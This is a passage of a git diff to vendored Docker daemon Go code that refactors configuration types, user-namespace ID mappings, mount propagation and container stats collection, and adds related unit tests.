driver on this kernel", driverName) + } } } else { selinuxSetDisabled() @@ -652,7 +798,7 @@ func configureKernelSecuritySupport(config *Config, driverName string) error { return nil } -func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { +func (daemon *Daemon) initNetworkController(config *config.Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) if err != nil { return nil, err @@ -687,6 +833,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ if err = n.Delete(); err != nil { return nil, fmt.Errorf("could not delete the default bridge network: %v", err) } + if len(config.NetworkConfig.DefaultAddressPools.Value()) > 0 && !daemon.configStore.LiveRestoreEnabled { + removeDefaultBridgeInterface() + } } if !config.DisableBridge { @@ -701,12 +850,12 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ return controller, nil } -func driverOptions(config *Config) []nwconfig.Option { +func driverOptions(config *config.Config) []nwconfig.Option { bridgeConfig := options.Generic{ - "EnableIPForwarding": config.bridgeConfig.EnableIPForward, - "EnableIPTables": config.bridgeConfig.EnableIPTables, - "EnableUserlandProxy": config.bridgeConfig.EnableUserlandProxy, - "UserlandProxyPath": config.bridgeConfig.UserlandProxyPath} + "EnableIPForwarding": config.BridgeConfig.EnableIPForward, + "EnableIPTables": config.BridgeConfig.EnableIPTables, + "EnableUserlandProxy": config.BridgeConfig.EnableUserlandProxy, + "UserlandProxyPath": config.BridgeConfig.UserlandProxyPath} bridgeOption := options.Generic{netlabel.GenericData: bridgeConfig} dOptions := []nwconfig.Option{} @@ -714,22 +863,22 @@ func driverOptions(config *Config) []nwconfig.Option { return dOptions } -func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { +func initBridgeDriver(controller libnetwork.NetworkController, config *config.Config) error { bridgeName := bridge.DefaultBridgeName - if config.bridgeConfig.Iface != "" { - bridgeName = config.bridgeConfig.Iface + if config.BridgeConfig.Iface != "" { + bridgeName = config.BridgeConfig.Iface } netOption := map[string]string{ bridge.BridgeName: bridgeName, bridge.DefaultBridge: strconv.FormatBool(true), netlabel.DriverMTU: strconv.Itoa(config.Mtu), - bridge.EnableIPMasquerade: strconv.FormatBool(config.bridgeConfig.EnableIPMasq), - bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), + bridge.EnableIPMasquerade: strconv.FormatBool(config.BridgeConfig.EnableIPMasq), + bridge.EnableICC: strconv.FormatBool(config.BridgeConfig.InterContainerCommunication), } // --ip processing - if config.bridgeConfig.DefaultIP != nil { - netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() + if config.BridgeConfig.DefaultIP != nil { + netOption[bridge.DefaultBindingIP] = config.BridgeConfig.DefaultIP.String() } var ( @@ -745,8 +894,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e } nw := nwList[0] - if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if len(nwList) > 1 && config.BridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.BridgeConfig.FixedCIDR) if err != nil { return errors.Wrap(err, "parse CIDR failed") } @@ -765,9 +914,9 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e ipamV4Conf.Gateway = nw.IP.String() } - if config.bridgeConfig.IP != "" { - ipamV4Conf.PreferredPool = config.bridgeConfig.IP - ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) + if config.BridgeConfig.IP != "" { + ipamV4Conf.PreferredPool = config.BridgeConfig.IP + ip, _, err := net.ParseCIDR(config.BridgeConfig.IP) if err != nil { return err } @@ -776,8 +925,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) } - if config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if config.BridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.BridgeConfig.FixedCIDR) if err != nil { return err } @@ -785,13 +934,13 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e ipamV4Conf.SubPool = fCIDR.String() } - if config.bridgeConfig.DefaultGatewayIPv4 != nil { - ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() + if config.BridgeConfig.DefaultGatewayIPv4 != nil { + ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.BridgeConfig.DefaultGatewayIPv4.String() } var deferIPv6Alloc bool - if config.bridgeConfig.FixedCIDRv6 != "" { - _, fCIDRv6, err := net.ParseCIDR(config.bridgeConfig.FixedCIDRv6) + if config.BridgeConfig.FixedCIDRv6 != "" { + _, fCIDRv6, err := net.ParseCIDR(config.BridgeConfig.FixedCIDRv6) if err != nil { return err } @@ -821,11 +970,11 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e } } - if config.bridgeConfig.DefaultGatewayIPv6 != nil { + if config.BridgeConfig.DefaultGatewayIPv6 != nil { if ipamV6Conf == nil { ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} } - ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.bridgeConfig.DefaultGatewayIPv6.String() + ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.BridgeConfig.DefaultGatewayIPv6.String() } v4Conf := []*libnetwork.IpamConf{ipamV4Conf} @@ -835,7 +984,7 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e } // Initialize default network on "bridge" with the same name _, err = controller.NewNetwork("bridge", "bridge", "", - libnetwork.NetworkOptionEnableIPv6(config.bridgeConfig.EnableIPv6), + libnetwork.NetworkOptionEnableIPv6(config.BridgeConfig.EnableIPv6), libnetwork.NetworkOptionDriverOpts(netOption), libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), libnetwork.NetworkOptionDeferIPv6Alloc(deferIPv6Alloc)) @@ -854,8 +1003,10 @@ func removeDefaultBridgeInterface() { } } -func (daemon *Daemon) getLayerInit() func(string) error { - return daemon.setupInitLayer +func setupInitLayer(idMappings *idtools.IDMappings) func(containerfs.ContainerFS) error { + return func(initPath containerfs.ContainerFS) error { + return initlayer.Setup(initPath, idMappings.RootPair()) + } } // Parse the remapped root (user namespace) option, which can be one of: @@ -925,7 +1076,6 @@ func parseRemappedRoot(usergrp string) (string, string, error) { if err != nil { return "", "", fmt.Errorf("Error during gid lookup for %q: %v", lookupName, err) } - groupID = group.Gid groupname = group.Name } } @@ -952,40 +1102,38 @@ func parseRemappedRoot(usergrp string) (string, string, error) { return username, groupname, nil } -func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { +func setupRemappedRoot(config *config.Config) (*idtools.IDMappings, error) { if runtime.GOOS != "linux" && config.RemappedRoot != "" { - return nil, nil, fmt.Errorf("User namespaces are only supported on Linux") + return nil, fmt.Errorf("User namespaces are only supported on Linux") } // if the daemon was started with remapped root option, parse // the config option to the int uid,gid values - var ( - uidMaps, gidMaps []idtools.IDMap - ) if config.RemappedRoot != "" { username, groupname, err := parseRemappedRoot(config.RemappedRoot) if err != nil { - return nil, nil, err + return nil, err } if username == "root" { // Cannot setup user namespaces with a 1-to-1 mapping; "--root=0:0" is a no-op // effectively logrus.Warn("User namespaces: root cannot be remapped with itself; user namespaces are OFF") - return uidMaps, gidMaps, nil + return &idtools.IDMappings{}, nil } logrus.Infof("User namespaces: ID ranges will be mapped to subuid/subgid ranges of: %s:%s", username, groupname) // update remapped root setting now that we have resolved them to actual names config.RemappedRoot = fmt.Sprintf("%s:%s", username, groupname) - uidMaps, gidMaps, err = idtools.CreateIDMappings(username, groupname) + mappings, err := idtools.NewIDMappings(username, groupname) if err != nil { - return nil, nil, fmt.Errorf("Can't create ID mappings: %v", err) + return nil, errors.Wrapf(err, "Can't create ID mappings: %v") } + return mappings, nil } - return uidMaps, gidMaps, nil + return &idtools.IDMappings{}, nil } -func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { +func setupDaemonRoot(config *config.Config, rootDir string, rootIDs idtools.IDPair) error { config.Root = rootDir // the docker root metadata directory needs to have execute permissions for all users (g+x,o+x) // so that syscalls executing as non-root, operating on subdirectories of the graph root @@ -1010,10 +1158,10 @@ func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error // a new subdirectory with ownership set to the remapped uid/gid (so as to allow // `chdir()` to work for containers namespaced to that uid/gid) if config.RemappedRoot != "" { - config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootUID, rootGID)) + config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootIDs.UID, rootIDs.GID)) logrus.Debugf("Creating user namespaced daemon root: %s", config.Root) // Create the root directory if it doesn't exist - if err := idtools.MkdirAllAs(config.Root, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(config.Root, 0700, rootIDs); err != nil { return fmt.Errorf("Cannot create daemon root: %s: %v", config.Root, err) } // we also need to verify that any pre-existing directories in the path to @@ -1026,14 +1174,63 @@ func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error if dirPath == "/" { break } - if !idtools.CanAccess(dirPath, rootUID, rootGID) { - return fmt.Errorf("A subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories.", config.Root) + if !idtools.CanAccess(dirPath, rootIDs) { + return fmt.Errorf("a subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories", config.Root) } } } + + if err := setupDaemonRootPropagation(config); err != nil { + logrus.WithError(err).WithField("dir", config.Root).Warn("Error while setting daemon root propagation, this is not generally critical but may cause some functionality to not work or fallback to less desirable behavior") + } + return nil +} + +func setupDaemonRootPropagation(cfg *config.Config) error { + rootParentMount, options, err := getSourceMount(cfg.Root) + if err != nil { + return errors.Wrap(err, "error getting daemon root's parent mount") + } + + var cleanupOldFile bool + cleanupFile := getUnmountOnShutdownPath(cfg) + defer func() { + if !cleanupOldFile { + return + } + if err := os.Remove(cleanupFile); err != nil && !os.IsNotExist(err) { + logrus.WithError(err).WithField("file", cleanupFile).Warn("could not clean up old root propagation unmount file") + } + }() + + if hasMountinfoOption(options, sharedPropagationOption, slavePropagationOption) { + cleanupOldFile = true + return nil + } + + if err := mount.MakeShared(cfg.Root); err != nil { + return errors.Wrap(err, "could not setup daemon root propagation to shared") + } + + // check the case where this may have already been a mount to itself. + // If so then the daemon only performed a remount and should not try to unmount this later. + if rootParentMount == cfg.Root { + cleanupOldFile = true + return nil + } + + if err := ioutil.WriteFile(cleanupFile, nil, 0600); err != nil { + return errors.Wrap(err, "error writing file to signal mount cleanup on shutdown") + } return nil } +// getUnmountOnShutdownPath generates the path to used when writing the file that signals to the daemon that on shutdown +// the daemon root should be unmounted. +func getUnmountOnShutdownPath(config *config.Config) string { + return filepath.Join(config.ExecRoot, "unmount-on-shutdown") +} + // registerLinks writes the links to a file. func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { if hostConfig == nil || hostConfig.NetworkMode.IsUserDefined() { @@ -1041,19 +1238,19 @@ func (daemon *Daemon) registerLinks(container *container.Container, hostConfig * } for _, l := range hostConfig.Links { - name, alias, err := runconfigopts.ParseLink(l) + name, alias, err := opts.ParseLink(l) if err != nil { return err } child, err := daemon.GetContainer(name) if err != nil { - return fmt.Errorf("Could not get container for %s", name) + return errors.Wrapf(err, "could not get container for %s", name) } for child.HostConfig.NetworkMode.IsContainer() { parts := strings.SplitN(string(child.HostConfig.NetworkMode), ":", 2) child, err = daemon.GetContainer(parts[1]) if err != nil { - return fmt.Errorf("Could not get container for %s", parts[1]) + return errors.Wrapf(err, "Could not get container for %s", parts[1]) } } if child.HostConfig.NetworkMode.IsHost() { @@ -1066,7 +1263,8 @@ func (daemon *Daemon) registerLinks(container *container.Container, hostConfig * // After we load all the links into the daemon // set them to nil on the hostconfig - return container.WriteHostConfig() + _, err := container.WriteHostConfig() + return err } // conditionalMountOnStart is a platform specific helper function during the @@ -1081,63 +1279,123 @@ func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container return daemon.Unmount(container) } +func copyBlkioEntry(entries []*containerd_cgroups.BlkIOEntry) []types.BlkioStatEntry { + out := make([]types.BlkioStatEntry, len(entries)) + for i, re := range entries { + out[i] = types.BlkioStatEntry{ + Major: re.Major, + Minor: re.Minor, + Op: re.Op, + Value: re.Value, + } + } + return out +} + func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { if !c.IsRunning() { - return nil, errNotRunning{c.ID} + return nil, errNotRunning(c.ID) } - stats, err := daemon.containerd.Stats(c.ID) + cs, err := daemon.containerd.Stats(context.Background(), c.ID) if err != nil { + if strings.Contains(err.Error(), "container not found") { + return nil, containerNotFound(c.ID) + } return nil, err } s := &types.StatsJSON{} - cgs := stats.CgroupStats - if cgs != nil { + s.Read = cs.Read + stats := cs.Metrics + if stats.Blkio != nil { s.BlkioStats = types.BlkioStats{ - IoServiceBytesRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceBytesRecursive), - IoServicedRecursive: copyBlkioEntry(cgs.BlkioStats.IoServicedRecursive), - IoQueuedRecursive: copyBlkioEntry(cgs.BlkioStats.IoQueuedRecursive), - IoServiceTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceTimeRecursive), - IoWaitTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoWaitTimeRecursive), - IoMergedRecursive: copyBlkioEntry(cgs.BlkioStats.IoMergedRecursive), - IoTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoTimeRecursive), - SectorsRecursive: copyBlkioEntry(cgs.BlkioStats.SectorsRecursive), - } - cpu := cgs.CpuStats + IoServiceBytesRecursive: copyBlkioEntry(stats.Blkio.IoServiceBytesRecursive), + IoServicedRecursive: copyBlkioEntry(stats.Blkio.IoServicedRecursive), + IoQueuedRecursive: copyBlkioEntry(stats.Blkio.IoQueuedRecursive), + IoServiceTimeRecursive: copyBlkioEntry(stats.Blkio.IoServiceTimeRecursive), + IoWaitTimeRecursive: copyBlkioEntry(stats.Blkio.IoWaitTimeRecursive), + IoMergedRecursive: copyBlkioEntry(stats.Blkio.IoMergedRecursive), + IoTimeRecursive: copyBlkioEntry(stats.Blkio.IoTimeRecursive), + SectorsRecursive: copyBlkioEntry(stats.Blkio.SectorsRecursive), + } + } + if stats.CPU != nil { s.CPUStats = types.CPUStats{ CPUUsage: types.CPUUsage{ - TotalUsage: cpu.CpuUsage.TotalUsage, - PercpuUsage: cpu.CpuUsage.PercpuUsage, - UsageInKernelmode: cpu.CpuUsage.UsageInKernelmode, - UsageInUsermode: cpu.CpuUsage.UsageInUsermode, + TotalUsage: stats.CPU.Usage.Total, + PercpuUsage: stats.CPU.Usage.PerCPU, + UsageInKernelmode: stats.CPU.Usage.Kernel, + UsageInUsermode: stats.CPU.Usage.User, }, ThrottlingData: types.ThrottlingData{ - Periods: cpu.ThrottlingData.Periods, - ThrottledPeriods: cpu.ThrottlingData.ThrottledPeriods, - ThrottledTime: cpu.ThrottlingData.ThrottledTime, + Periods: stats.CPU.Throttling.Periods, + ThrottledPeriods: stats.CPU.Throttling.ThrottledPeriods, + ThrottledTime: stats.CPU.Throttling.ThrottledTime, }, } - mem := cgs.MemoryStats.Usage - s.MemoryStats = types.MemoryStats{ - Usage: mem.Usage, - MaxUsage: mem.MaxUsage, - Stats: cgs.MemoryStats.Stats, - Failcnt: mem.Failcnt, - Limit: mem.Limit, + } + + if stats.Memory != nil { + raw := make(map[string]uint64) + raw["cache"] = stats.Memory.Cache + raw["rss"] = stats.Memory.RSS + raw["rss_huge"] = stats.Memory.RSSHuge + raw["mapped_file"] = stats.Memory.MappedFile + raw["dirty"] = stats.Memory.Dirty + raw["writeback"] = stats.Memory.Writeback + raw["pgpgin"] = stats.Memory.PgPgIn + raw["pgpgout"] = stats.Memory.PgPgOut + raw["pgfault"] = stats.Memory.PgFault + raw["pgmajfault"] = stats.Memory.PgMajFault + raw["inactive_anon"] = stats.Memory.InactiveAnon + raw["active_anon"] = stats.Memory.ActiveAnon + raw["inactive_file"] = stats.Memory.InactiveFile + raw["active_file"] = stats.Memory.ActiveFile + raw["unevictable"] = stats.Memory.Unevictable + raw["hierarchical_memory_limit"] = stats.Memory.HierarchicalMemoryLimit + raw["hierarchical_memsw_limit"] = stats.Memory.HierarchicalSwapLimit + raw["total_cache"] = stats.Memory.TotalCache + raw["total_rss"] = stats.Memory.TotalRSS + raw["total_rss_huge"] = stats.Memory.TotalRSSHuge + raw["total_mapped_file"] = stats.Memory.TotalMappedFile + raw["total_dirty"] = stats.Memory.TotalDirty + raw["total_writeback"] = stats.Memory.TotalWriteback + raw["total_pgpgin"] = stats.Memory.TotalPgPgIn + raw["total_pgpgout"] = stats.Memory.TotalPgPgOut + raw["total_pgfault"] = stats.Memory.TotalPgFault + raw["total_pgmajfault"] = stats.Memory.TotalPgMajFault + raw["total_inactive_anon"] = stats.Memory.TotalInactiveAnon + raw["total_active_anon"] = stats.Memory.TotalActiveAnon + raw["total_inactive_file"] = stats.Memory.TotalInactiveFile + raw["total_active_file"] = stats.Memory.TotalActiveFile + raw["total_unevictable"] = stats.Memory.TotalUnevictable + + if stats.Memory.Usage != nil { + s.MemoryStats = types.MemoryStats{ + Stats: raw, + Usage: stats.Memory.Usage.Usage, + MaxUsage: stats.Memory.Usage.Max, + Limit: stats.Memory.Usage.Limit, + Failcnt: stats.Memory.Usage.Failcnt, + } + } else { + s.MemoryStats = types.MemoryStats{ + Stats: raw, + } } + // if the container does not set memory limit, use the machineMemory - if mem.Limit > daemon.statsCollector.machineMemory && daemon.statsCollector.machineMemory > 0 { - s.MemoryStats.Limit = daemon.statsCollector.machineMemory - } - if cgs.PidsStats != nil { - s.PidsStats = types.PidsStats{ - Current: cgs.PidsStats.Current, - } + if s.MemoryStats.Limit > daemon.machineMemory && daemon.machineMemory > 0 { + s.MemoryStats.Limit = daemon.machineMemory } } - s.Read, err = ptypes.Timestamp(stats.Timestamp) - if err != nil { - return nil, err + + if stats.Pids != nil { + s.PidsStats = types.PidsStats{ + Current: stats.Pids.Current, + Limit: stats.Pids.Limit, + } } + return s, nil } @@ -1147,21 +1405,45 @@ func (daemon *Daemon) setDefaultIsolation() error { return nil } -func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { - var layers []string - for _, l := range rootfs.DiffIDs { - layers = append(layers, l.String()) +// setupDaemonProcess sets various settings for the daemon's process +func setupDaemonProcess(config *config.Config) error { + // setup the daemons oom_score_adj + if err := setupOOMScoreAdj(config.OOMScoreAdjust); err != nil { + return err } - return types.RootFS{ - Type: rootfs.Type, - Layers: layers, + if err := setMayDetachMounts(); err != nil { + logrus.WithError(err).Warn("Could not set may_detach_mounts kernel parameter") } + return nil } -// setupDaemonProcess sets various settings for the daemon's process -func setupDaemonProcess(config *Config) error { - // setup the daemons oom_score_adj - return setupOOMScoreAdj(config.OOMScoreAdjust) +// This is used to allow removal of mountpoints that may be mounted in other +// namespaces on RHEL based kernels starting from RHEL 7.4. +// Without this setting, removals on these RHEL based kernels may fail with +// "device or resource busy". +// This setting is not available in upstream kernels as it is not configurable, +// but has been in the upstream kernels since 3.15. +func setMayDetachMounts() error { + f, err := os.OpenFile("/proc/sys/fs/may_detach_mounts", os.O_WRONLY, 0) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return errors.Wrap(err, "error opening may_detach_mounts kernel config file") + } + defer f.Close() + + _, err = f.WriteString("1") + if os.IsPermission(err) { + // Setting may_detach_mounts does not work in an + // unprivileged container. Ignore the error, but log + // it if we appear not to be in that situation. + if !rsystem.RunningInUserNS() { + logrus.Debugf("Permission denied writing %q to /proc/sys/fs/may_detach_mounts", "1") + } + return nil + } + return err } func setupOOMScoreAdj(score int) error { @@ -1169,7 +1451,7 @@ func setupOOMScoreAdj(score int) error { if err != nil { return err } - + defer f.Close() stringScore := strconv.Itoa(score) _, err = f.WriteString(stringScore) if os.IsPermission(err) { @@ -1181,7 +1463,7 @@ func setupOOMScoreAdj(score int) error { } return nil } - f.Close() + return err } @@ -1198,26 +1480,30 @@ func (daemon *Daemon) initCgroupsPath(path string) error { // for the period and runtime as this limits what the children can be set to. daemon.initCgroupsPath(filepath.Dir(path)) - _, root, err := cgroups.FindCgroupMountpointAndRoot("cpu") + mnt, root, err := cgroups.FindCgroupMountpointAndRoot("cpu") if err != nil { return err } + // When docker is run inside docker, the root is based of the host cgroup. + // Should this be handled in runc/libcontainer/cgroups ? + if strings.HasPrefix(root, "/docker/") { + root = "/" + } - path = filepath.Join(root, path) + path = filepath.Join(mnt, root, path) sysinfo := sysinfo.New(true) - if sysinfo.CPURealtimePeriod && daemon.configStore.CPURealtimePeriod != 0 { - if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { - return err - } - if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_period_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimePeriod, 10)), 0700); err != nil { - return err - } + if err := maybeCreateCPURealTimeFile(sysinfo.CPURealtimePeriod, daemon.configStore.CPURealtimePeriod, "cpu.rt_period_us", path); err != nil { + return err } - if sysinfo.CPURealtimeRuntime && daemon.configStore.CPURealtimeRuntime != 0 { - if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { + return maybeCreateCPURealTimeFile(sysinfo.CPURealtimeRuntime, daemon.configStore.CPURealtimeRuntime, "cpu.rt_runtime_us", path) +} + +func maybeCreateCPURealTimeFile(sysinfoPresent bool, configValue int64, file string, path string) error { + if sysinfoPresent && configValue != 0 { + if err := os.MkdirAll(path, 0755); err != nil { return err } - if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_runtime_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimeRuntime, 10)), 0700); err != nil { + if err := ioutil.WriteFile(filepath.Join(path, file), []byte(strconv.FormatInt(configValue, 10)), 0700); err != nil { return err } } diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go index 6250d359e3..36c6030988 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go +++ b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go @@ -1,21 +1,56 @@ -// +build !windows,!solaris +// +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "errors" "io/ioutil" "os" - "path/filepath" "testing" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/docker/docker/volume/store" + "github.com/docker/docker/daemon/config" ) +type fakeContainerGetter struct { + containers map[string]*container.Container +} + +func (f *fakeContainerGetter) GetContainer(cid string) (*container.Container, error) { + container, ok := f.containers[cid] + if !ok { + return nil, errors.New("container not found") + } + return container, nil +} + +// Unix test as uses settings which are not available on Windows +func TestAdjustSharedNamespaceContainerName(t *testing.T) { + fakeID := "abcdef1234567890" + hostConfig := &containertypes.HostConfig{ + IpcMode: containertypes.IpcMode("container:base"), + PidMode: containertypes.PidMode("container:base"), + NetworkMode: containertypes.NetworkMode("container:base"), + } + containerStore := &fakeContainerGetter{} + containerStore.containers = make(map[string]*container.Container) + containerStore.containers["base"] = &container.Container{ + ID: fakeID, + } + + adaptSharedNamespaceContainer(containerStore, hostConfig) + if hostConfig.IpcMode != containertypes.IpcMode("container:"+fakeID) { + t.Errorf("Expected IpcMode to be container:%s", fakeID) + } + if hostConfig.PidMode != containertypes.PidMode("container:"+fakeID) { + t.Errorf("Expected PidMode to be container:%s", fakeID) + } + if hostConfig.NetworkMode != containertypes.NetworkMode("container:"+fakeID) { + t.Errorf("Expected NetworkMode to be container:%s", fakeID) + } +} + // Unix test as uses settings which are not available on Windows func TestAdjustCPUShares(t *testing.T) { tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") @@ -179,10 +214,39 @@ func TestParseSecurityOpt(t *testing.T) { } } +func TestParseNNPSecurityOptions(t *testing.T) { + daemon := &Daemon{ + configStore: &config.Config{NoNewPrivileges: true}, + } + container := &container.Container{} + config := &containertypes.HostConfig{} + + // test NNP when "daemon:true" and "no-new-privileges=false"" + config.SecurityOpt = []string{"no-new-privileges=false"} + + if err := daemon.parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected daemon.parseSecurityOpt error: %v", err) + } + if container.NoNewPrivileges { + t.Fatalf("container.NoNewPrivileges should be FALSE: %v", container.NoNewPrivileges) + } + + // test NNP when "daemon:false" and "no-new-privileges=true"" + daemon.configStore.NoNewPrivileges = false + config.SecurityOpt = []string{"no-new-privileges=true"} + + if err := daemon.parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected daemon.parseSecurityOpt error: %v", err) + } + if !container.NoNewPrivileges { + t.Fatalf("container.NoNewPrivileges should be TRUE: %v", container.NoNewPrivileges) + } +} + func TestNetworkOptions(t *testing.T) { daemon := &Daemon{} - dconfigCorrect := &Config{ - CommonConfig: CommonConfig{ + dconfigCorrect := &config.Config{ + CommonConfig: config.CommonConfig{ ClusterStore: "consul://localhost:8500", ClusterAdvertise: "192.168.0.1:8000", }, @@ -192,92 +256,13 @@ func TestNetworkOptions(t *testing.T) { t.Fatalf("Expect networkOptions success, got error: %v", err) } - dconfigWrong := &Config{ - CommonConfig: CommonConfig{ + dconfigWrong := &config.Config{ + CommonConfig: config.CommonConfig{ ClusterStore: "consul://localhost:8500://test://bbb", }, } if _, err := daemon.networkOptions(dconfigWrong, nil, nil); err == nil { - t.Fatalf("Expected networkOptions error, got nil") - } -} - -func TestMigratePre17Volumes(t *testing.T) { - rootDir, err := ioutil.TempDir("", "test-daemon-volumes") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(rootDir) - - volumeRoot := filepath.Join(rootDir, "volumes") - err = os.MkdirAll(volumeRoot, 0755) - if err != nil { - t.Fatal(err) - } - - containerRoot := filepath.Join(rootDir, "containers") - cid := "1234" - err = os.MkdirAll(filepath.Join(containerRoot, cid), 0755) - - vid := "5678" - vfsPath := filepath.Join(rootDir, "vfs", "dir", vid) - err = os.MkdirAll(vfsPath, 0755) - if err != nil { - t.Fatal(err) - } - - config := []byte(` - { - "ID": "` + cid + `", - "Volumes": { - "/foo": "` + vfsPath + `", - "/bar": "/foo", - "/quux": "/quux" - }, - "VolumesRW": { - "/foo": true, - "/bar": true, - "/quux": false - } - } - `) - - volStore, err := store.New(volumeRoot) - if err != nil { - t.Fatal(err) - } - drv, err := local.New(volumeRoot, 0, 0) - if err != nil { - t.Fatal(err) - } - volumedrivers.Register(drv, volume.DefaultDriverName) - - daemon := &Daemon{root: rootDir, repository: containerRoot, volumes: volStore} - err = ioutil.WriteFile(filepath.Join(containerRoot, cid, "config.v2.json"), config, 600) - if err != nil { - t.Fatal(err) - } - c, err := daemon.load(cid) - if err != nil { - t.Fatal(err) - } - if err := daemon.verifyVolumesInfo(c); err != nil { - t.Fatal(err) - } - - expected := map[string]volume.MountPoint{ - "/foo": {Destination: "/foo", RW: true, Name: vid}, - "/bar": {Source: "/foo", Destination: "/bar", RW: true}, - "/quux": {Source: "/quux", Destination: "/quux", RW: false}, - } - for id, mp := range c.MountPoints { - x, exists := expected[id] - if !exists { - t.Fatal("volume not migrated") - } - if mp.Source != x.Source || mp.Destination != x.Destination || mp.RW != x.RW || mp.Name != x.Name { - t.Fatalf("got unexpected mountpoint, expected: %+v, got: %+v", x, mp) - } + t.Fatal("Expected networkOptions error, got nil") } } diff --git a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go index cb1acf63d6..ee680b6411 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go @@ -1,5 +1,5 @@ -// +build !linux,!freebsd,!windows,!solaris +// +build !linux,!freebsd,!windows -package daemon +package daemon // import "github.com/docker/docker/daemon" const platformSupported = false diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows.go b/vendor/github.com/docker/docker/daemon/daemon_windows.go index 51ad68b357..1f801032df 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_windows.go +++ b/vendor/github.com/docker/docker/daemon/daemon_windows.go @@ -1,16 +1,18 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" - "os" + "path/filepath" "strings" "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/image" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/platform" @@ -23,8 +25,10 @@ import ( winlibnetwork "github.com/docker/libnetwork/drivers/windows" "github.com/docker/libnetwork/netlabel" "github.com/docker/libnetwork/options" - blkiodev "github.com/opencontainers/runc/libcontainer/configs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" "golang.org/x/sys/windows" + "golang.org/x/sys/windows/svc/mgr" ) const ( @@ -34,34 +38,22 @@ const ( windowsMaxCPUShares = 10000 windowsMinCPUPercent = 1 windowsMaxCPUPercent = 100 - windowsMinCPUCount = 1 ) -func getBlkioWeightDevices(config *containertypes.HostConfig) ([]blkiodev.WeightDevice, error) { - 